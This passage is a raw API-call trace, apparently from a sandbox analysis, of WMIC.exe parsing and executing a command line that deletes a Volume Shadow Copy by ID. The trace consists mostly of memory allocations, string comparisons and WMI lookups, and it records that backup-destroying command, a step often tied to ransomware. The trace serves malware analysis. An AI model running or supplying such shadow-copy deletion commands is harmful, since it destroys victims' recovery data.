(param_1="wmiclitableformat.xsl") returned 0x15 [0115.146] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.146] malloc (_Size=0x30) returned 0x3e8400 [0115.146] malloc (_Size=0x18) returned 0x3ec8e0 [0115.146] free (_Block=0x3ec8e0) [0115.146] malloc (_Size=0x18) returned 0x3ec8e0 [0115.147] malloc (_Size=0x18) returned 0x3ec900 [0115.147] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.147] SysStringLen (param_1="TABLE") returned 0x5 [0115.147] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.147] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.147] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.147] SysStringLen (param_1="XML") returned 0x3 [0115.147] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.147] SysStringLen (param_1="texttablewsys") returned 0xd [0115.147] SysStringLen (param_1="XML") returned 0x3 [0115.147] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.147] malloc (_Size=0x30) returned 0x3e8440 [0115.147] malloc (_Size=0x18) returned 0x3ec920 [0115.147] free (_Block=0x3ec920) [0115.147] malloc (_Size=0x18) returned 0x3ec920 [0115.147] malloc (_Size=0x18) returned 0x3ec940 [0115.147] SysStringLen (param_1="htable-sortby") returned 0xd [0115.147] SysStringLen (param_1="TABLE") returned 0x5 [0115.147] SysStringLen (param_1="htable-sortby") returned 0xd [0115.147] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.147] SysStringLen (param_1="htable-sortby") returned 0xd [0115.147] SysStringLen (param_1="XML") returned 0x3 [0115.147] SysStringLen (param_1="htable-sortby") returned 0xd [0115.147] SysStringLen (param_1="texttablewsys") returned 0xd [0115.147] SysStringLen (param_1="htable-sortby") returned 0xd [0115.148] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.148] SysStringLen (param_1="XML") returned 0x3 [0115.148] SysStringLen (param_1="htable-sortby") returned 0xd [0115.148] malloc (_Size=0x30) returned 0x3e8480 [0115.148] malloc (_Size=0x18) returned 0x3ec960 [0115.148] free (_Block=0x3ec960) [0115.148] malloc (_Size=0x18) returned 0x3ec960 [0115.148] malloc (_Size=0x18) returned 0x3ec980 [0115.148] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.148] SysStringLen (param_1="TABLE") returned 0x5 [0115.148] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.148] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.148] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.148] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.148] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.148] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.148] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.148] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.148] malloc (_Size=0x30) returned 0x3e84c0 [0115.148] malloc (_Size=0x18) returned 0x3ec9a0 [0115.149] free (_Block=0x3ec9a0) [0115.149] malloc (_Size=0x18) returned 0x3ec9a0 [0115.149] malloc (_Size=0x18) returned 0x3ec9c0 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] SysStringLen (param_1="TABLE") returned 0x5 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.149] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.149] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.149] malloc (_Size=0x30) returned 0x3e8500 [0115.149] malloc (_Size=0x18) returned 0x3ec9e0 [0115.149] free (_Block=0x3ec9e0) [0115.149] malloc (_Size=0x18) returned 0x3ec9e0 [0115.149] malloc (_Size=0x18) returned 0x3eca00 [0115.150] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.150] SysStringLen (param_1="TABLE") returned 0x5 [0115.150] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.150] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.150] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.150] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.150] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.150] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.150] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.150] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.150] malloc (_Size=0x30) returned 0x3e8540 [0115.150] malloc (_Size=0x18) returned 0x3eca20 [0115.150] free (_Block=0x3eca20) [0115.150] malloc (_Size=0x18) returned 0x3eca20 [0115.150] malloc (_Size=0x18) returned 0x3eca40 [0115.150] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.150] SysStringLen (param_1="TABLE") returned 0x5 [0115.151] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.151] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.151] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.151] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.151] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.151] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.151] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.151] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.151] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.151] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.151] malloc (_Size=0x30) returned 0x3e8580 [0115.151] FreeThreadedDOMDocument:IUnknown:Release (This=0x21071d0) returned 0x0 [0115.151] free (_Block=0x3e6e90) [0115.151] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" [0115.151] malloc (_Size=0xe0) returned 0x3ecd30 [0115.151] memcpy_s (in: _Destination=0x3ecd30, _DestinationSize=0xde, _Source=0xb25be, _SourceSize=0xd0 | out: _Destination=0x3ecd30) returned 0x0 [0115.151] malloc (_Size=0x18) returned 0x3eca60 [0115.151] malloc (_Size=0x18) returned 0x3eca80 [0115.151] malloc (_Size=0x18) returned 0x3ecaa0 [0115.151] malloc (_Size=0x18) returned 0x3ecac0 [0115.152] malloc (_Size=0x80) returned 0x3e6e90 [0115.152] GetLocalTime (in: lpSystemTime=0x28f570 | out: lpSystemTime=0x28f570*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x13, wMilliseconds=0x2a1)) [0115.152] _vsnwprintf (in: _Buffer=0x3e6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x28f4c8 | out: _Buffer="09-04-2020T08:55:19") returned 19 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] malloc (_Size=0x90) returned 0x3e70a0 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] malloc (_Size=0x90) returned 0x3ece20 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] malloc (_Size=0x16) returned 0x3ecae0 [0115.152] lstrlenW (lpString="shadowcopy") returned 10 [0115.152] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0115.152] malloc (_Size=0x16) returned 0x3ecb00 [0115.152] malloc (_Size=0x8) returned 0x3e7140 [0115.152] free (_Block=0x0) [0115.152] free (_Block=0x3ecae0) [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] malloc (_Size=0xc) returned 0x3ecae0 [0115.152] lstrlenW (lpString="where") returned 5 [0115.152] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0115.152] malloc (_Size=0xc) returned 0x3ecb20 [0115.152] malloc (_Size=0x10) returned 0x3ecb40 [0115.152] memmove_s (in: _Destination=0x3ecb40, _DestinationSize=0x8, _Source=0x3e7140, _SourceSize=0x8 | out: _Destination=0x3ecb40) returned 0x0 [0115.152] free (_Block=0x3e7140) [0115.152] free (_Block=0x0) [0115.152] free (_Block=0x3ecae0) [0115.152] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.152] malloc (_Size=0x5c) returned 0x3ecec0 [0115.152] lstrlenW (lpString="\"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\"") returned 45 [0115.152] _wcsicmp (_String1="\"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\"", _String2="\"NULL\"") returned -5 [0115.152] lstrlenW (lpString="\"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\"") returned 45 [0115.152] lstrlenW (lpString="\"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\"") returned 45 [0115.153] malloc (_Size=0x5c) returned 0x3ecf30 [0115.153] malloc (_Size=0x18) returned 0x3ecae0 [0115.153] memmove_s (in: _Destination=0x3ecae0, _DestinationSize=0x10, _Source=0x3ecb40, _SourceSize=0x10 | out: _Destination=0x3ecae0) returned 0x0 [0115.153] free (_Block=0x3ecb40) [0115.153] free (_Block=0x0) [0115.153] free (_Block=0x3ecec0) [0115.153] lstrlenW (lpString=" shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 71 [0115.153] malloc (_Size=0xe) returned 0x3ecb40 [0115.153] lstrlenW (lpString="delete") returned 6 [0115.153] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0115.153] malloc (_Size=0xe) returned 0x3ecb60 [0115.153] malloc (_Size=0x20) returned 0x3ecec0 [0115.153] memmove_s (in: _Destination=0x3ecec0, _DestinationSize=0x18, _Source=0x3ecae0, _SourceSize=0x18 | out: _Destination=0x3ecec0) returned 0x0 [0115.153] free (_Block=0x3ecae0) [0115.153] free (_Block=0x0) [0115.153] free (_Block=0x3ecb40) [0115.153] malloc (_Size=0x20) returned 0x3ecef0 [0115.153] lstrlenW (lpString="QUIT") returned 4 [0115.153] lstrlenW (lpString="shadowcopy") returned 10 [0115.153] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0115.153] lstrlenW (lpString="EXIT") returned 4 [0115.153] lstrlenW (lpString="shadowcopy") returned 10 [0115.153] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0115.153] free (_Block=0x3ecef0) [0115.153] WbemLocator:IUnknown:AddRef (This=0x1cd1390) returned 0x2 [0115.153] malloc (_Size=0x20) returned 0x3ecef0 [0115.153] lstrlenW (lpString="/") returned 1 [0115.153] lstrlenW (lpString="shadowcopy") returned 10 [0115.153] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0115.153] lstrlenW (lpString="-") returned 1 [0115.153] lstrlenW (lpString="shadowcopy") returned 10 [0115.153] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0115.153] lstrlenW (lpString="CLASS") returned 5 [0115.154] lstrlenW (lpString="shadowcopy") returned 10 [0115.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0115.154] lstrlenW (lpString="PATH") returned 4 [0115.154] lstrlenW (lpString="shadowcopy") returned 10 [0115.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0115.154] lstrlenW (lpString="CONTEXT") returned 7 [0115.154] lstrlenW (lpString="shadowcopy") returned 10 [0115.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0115.154] lstrlenW (lpString="shadowcopy") returned 10 [0115.154] malloc (_Size=0x16) returned 0x3ecb40 [0115.154] lstrlenW (lpString="shadowcopy") returned 10 [0115.154] GetCurrentThreadId () returned 0xb40 [0115.154] ??0CHString@@QEAA@XZ () returned 0x28f380 [0115.154] malloc (_Size=0x18) returned 0x3ecae0 [0115.154] malloc (_Size=0x18) returned 0x3ecb80 [0115.154] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xfffc2998 | out: ppNamespace=0xfffc2998*=0x1ce3a98) returned 0x0 [0115.180] free (_Block=0x3ecb80) [0115.180] free (_Block=0x3ecae0) [0115.180] CoSetProxyBlanket (pProxy=0x1ce3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.180] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.180] GetCurrentThreadId () returned 0xb40 [0115.180] ??0CHString@@QEAA@XZ () returned 0x28f218 [0115.180] malloc (_Size=0x18) returned 0x3ecae0 [0115.180] malloc (_Size=0x18) returned 0x3ecb80 [0115.180] malloc (_Size=0x18) returned 0x3ecba0 [0115.180] malloc (_Size=0x18) returned 0x3ecbc0 [0115.180] SysStringLen (param_1="root\\cli") returned 0x8 [0115.180] SysStringLen (param_1="\\") returned 0x1 [0115.181] malloc (_Size=0x18) returned 0x3ecbe0 [0115.181] SysStringLen (param_1="root\\cli\\") returned 0x9 [0115.181] SysStringLen (param_1="ms_409") returned 0x6 [0115.181] free (_Block=0x3ecbc0) [0115.181] free (_Block=0x3ecba0) [0115.181] free (_Block=0x3ecb80) [0115.181] free (_Block=0x3ecae0) [0115.181] malloc (_Size=0x18) returned 0x3ecae0 [0115.181] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xfffc29a0 | out: ppNamespace=0xfffc29a0*=0x1ce3b28) returned 0x0 [0115.183] free (_Block=0x3ecae0) [0115.183] free (_Block=0x3ecbe0) [0115.183] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.183] GetCurrentThreadId () returned 0xb40 [0115.183] ??0CHString@@QEAA@XZ () returned 0x28f390 [0115.183] malloc (_Size=0x18) returned 0x3ecbe0 [0115.184] malloc (_Size=0x18) returned 0x3ecae0 [0115.184] malloc (_Size=0x18) returned 0x3ecb80 [0115.184] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0115.184] malloc (_Size=0x3a) returned 0x3ecfa0 [0115.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfff51980, cbMultiByte=-1, lpWideCharStr=0x3ecfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0115.184] free (_Block=0x3ecfa0) [0115.184] malloc (_Size=0x18) returned 0x3ecba0 [0115.184] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0115.184] SysStringLen (param_1="shadowcopy") returned 0xa [0115.184] malloc (_Size=0x18) returned 0x3ecbc0 [0115.184] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0115.184] SysStringLen (param_1="'") returned 0x1 [0115.184] free (_Block=0x3ecba0) [0115.184] free (_Block=0x3ecb80) [0115.184] free (_Block=0x3ecae0) [0115.184] free (_Block=0x3ecbe0) [0115.184] IWbemServices:GetObject (in: This=0x1ce3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x28f398*=0x0, ppCallResult=0x0 | out: ppObject=0x28f398*=0x1cf04e0, ppCallResult=0x0) returned 0x0 [0115.189] malloc (_Size=0x18) returned 0x3ecbe0 [0115.189] IWbemClassObject:Get (in: This=0x1cf04e0, wszName="Target", lFlags=0, pVal=0x28f2c0*(varType=0x0, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffc2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f2c0*(varType=0x8, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.189] free (_Block=0x3ecbe0) [0115.189] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.189] malloc (_Size=0x3e) returned 0x3ecfa0 [0115.189] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0115.189] malloc (_Size=0x18) returned 0x3ecbe0 [0115.189] IWbemClassObject:Get (in: This=0x1cf04e0, wszName="PWhere", lFlags=0, pVal=0x28f2c0*(varType=0x0, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1=0xde298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f2c0*(varType=0x8, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.189] free (_Block=0x3ecbe0) [0115.189] lstrlenW (lpString=" Where ID = '#'") returned 15 [0115.189] malloc (_Size=0x20) returned 0x3ecff0 [0115.189] lstrlenW (lpString=" Where ID = '#'") returned 15 [0115.189] malloc (_Size=0x18) returned 0x3ecbe0 [0115.189] IWbemClassObject:Get (in: This=0x1cf04e0, wszName="Connection", lFlags=0, pVal=0x28f2c0*(varType=0x0, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1=0x12bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f2c0*(varType=0xd, wReserved1=0xfffc, wReserved2=0x0, wReserved3=0x0, varVal1=0x1cf09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.190] free (_Block=0x3ecbe0) [0115.190] IUnknown:QueryInterface (in: This=0x1cf09c0, riid=0xfff57360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x28f2b0 | out: ppvObject=0x28f2b0*=0x1cf09c0) returned 0x0 [0115.190] GetCurrentThreadId () returned 0xb40 [0115.190] ??0CHString@@QEAA@XZ () returned 0x28f1d8 [0115.190] malloc (_Size=0x18) returned 0x3ecbe0 [0115.190] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="Namespace", lFlags=0, pVal=0x28f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfff6738f, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.190] free (_Block=0x3ecbe0) [0115.190] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0115.190] malloc (_Size=0x16) returned 0x3ecbe0 [0115.190] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0115.190] malloc (_Size=0x18) returned 0x3ecae0 [0115.190] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="Locale", lFlags=0, pVal=0x28f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.190] free (_Block=0x3ecae0) [0115.190] lstrlenW (lpString="ms_409") returned 6 [0115.190] malloc (_Size=0xe) returned 0x3ecae0 [0115.190] lstrlenW (lpString="ms_409") returned 6 [0115.190] malloc (_Size=0x18) returned 0x3ecb80 [0115.190] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="User", lFlags=0, pVal=0x28f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.190] free (_Block=0x3ecb80) [0115.190] malloc (_Size=0x18) returned 0x3ecb80 [0115.191] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="Password", lFlags=0, pVal=0x28f200*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.191] free (_Block=0x3ecb80) [0115.191] malloc (_Size=0x18) returned 0x3ecb80 [0115.191] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="Server", lFlags=0, pVal=0x28f200*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.191] free (_Block=0x3ecb80) [0115.191] lstrlenW (lpString=".") returned 1 [0115.191] malloc (_Size=0x4) returned 0x3e7140 [0115.191] lstrlenW (lpString=".") returned 1 [0115.191] malloc (_Size=0x18) returned 0x3ecb80 [0115.191] IWbemClassObject:Get (in: This=0x1cf09c0, wszName="Authority", lFlags=0, pVal=0x28f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0x3ecbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.191] free (_Block=0x3ecb80) [0115.191] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.191] IUnknown:Release (This=0x1cf09c0) returned 0x1 [0115.191] GetCurrentThreadId () returned 0xb40 [0115.191] ??0CHString@@QEAA@XZ () returned 0x28f1d8 [0115.191] malloc (_Size=0x18) returned 0x3ecb80 [0115.191] IWbemClassObject:Get (in: This=0x1cf04e0, wszName="__RELPATH", lFlags=0, pVal=0x28f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x28f200*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0115.191] free (_Block=0x3ecb80) [0115.191] malloc (_Size=0x18) returned 0x3ecb80 [0115.191] GetCurrentThreadId () returned 0xb40 [0115.191] ??0CHString@@QEAA@XZ () returned 0x28f058 [0115.192] ??0CHString@@QEAA@PEBG@Z () returned 0x28f070 [0115.192] ??0CHString@@QEAA@AEBV0@@Z () returned 0x28f000 [0115.192] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0115.192] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x3ed020 [0115.192] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0115.192] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28efc0 [0115.192] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f008 [0115.192] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f070 [0115.192] ??1CHString@@QEAA@XZ () returned 0x9174401 [0115.192] ??1CHString@@QEAA@XZ () returned 0x9174401 [0115.192] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28efc8 [0115.192] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f000 [0115.192] ??1CHString@@QEAA@XZ () returned 0x1 [0115.192] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x3ed090 [0115.192] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0115.192] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28efc0 [0115.192] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f008 [0115.192] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f070 [0115.192] ??1CHString@@QEAA@XZ () returned 0x9174401 [0115.192] ??1CHString@@QEAA@XZ () returned 0x9174401 [0115.192] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28efc8 [0115.192] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f000 [0115.192] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.192] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0115.192] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0115.192] malloc (_Size=0x18) returned 0x3ecba0 [0115.192] malloc (_Size=0x18) returned 0x3ecc00 [0115.192] malloc (_Size=0x18) returned 0x3ecc20 [0115.193] malloc (_Size=0x18) returned 0x3ecc40 [0115.193] malloc (_Size=0x18) returned 0x3ecc60 [0115.193] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0115.193] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0115.193] malloc (_Size=0x18) returned 0x3ecc80 [0115.193] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0115.193] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0115.193] malloc (_Size=0x18) returned 0x3ecca0 [0115.193] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0115.193] SysStringLen (param_1="\"") returned 0x1 [0115.193] free (_Block=0x3ecc80) [0115.193] free (_Block=0x3ecc60) [0115.193] free (_Block=0x3ecc40) [0115.193] free (_Block=0x3ecc20) [0115.193] free (_Block=0x3ecc00) [0115.193] free (_Block=0x3ecba0) [0115.193] IWbemServices:GetObject (in: This=0x1ce3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x28f048*=0x0, ppCallResult=0x0 | out: ppObject=0x28f048*=0x1cf0a50, ppCallResult=0x0) returned 0x0 [0115.194] malloc (_Size=0x18) returned 0x3ecba0 [0115.194] IWbemClassObject:Get (in: This=0x1cf0a50, wszName="Text", lFlags=0, pVal=0x28f080*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffc2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x28f080*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x154aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0xde030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0115.194] free (_Block=0x3ecba0) [0115.194] SafeArrayGetLBound (in: psa=0x154aa0, nDim=0x1, plLbound=0x28f060 | out: plLbound=0x28f060) returned 0x0 [0115.194] SafeArrayGetUBound (in: psa=0x154aa0, nDim=0x1, plUbound=0x28f050 | out: plUbound=0x28f050) returned 0x0 [0115.194] 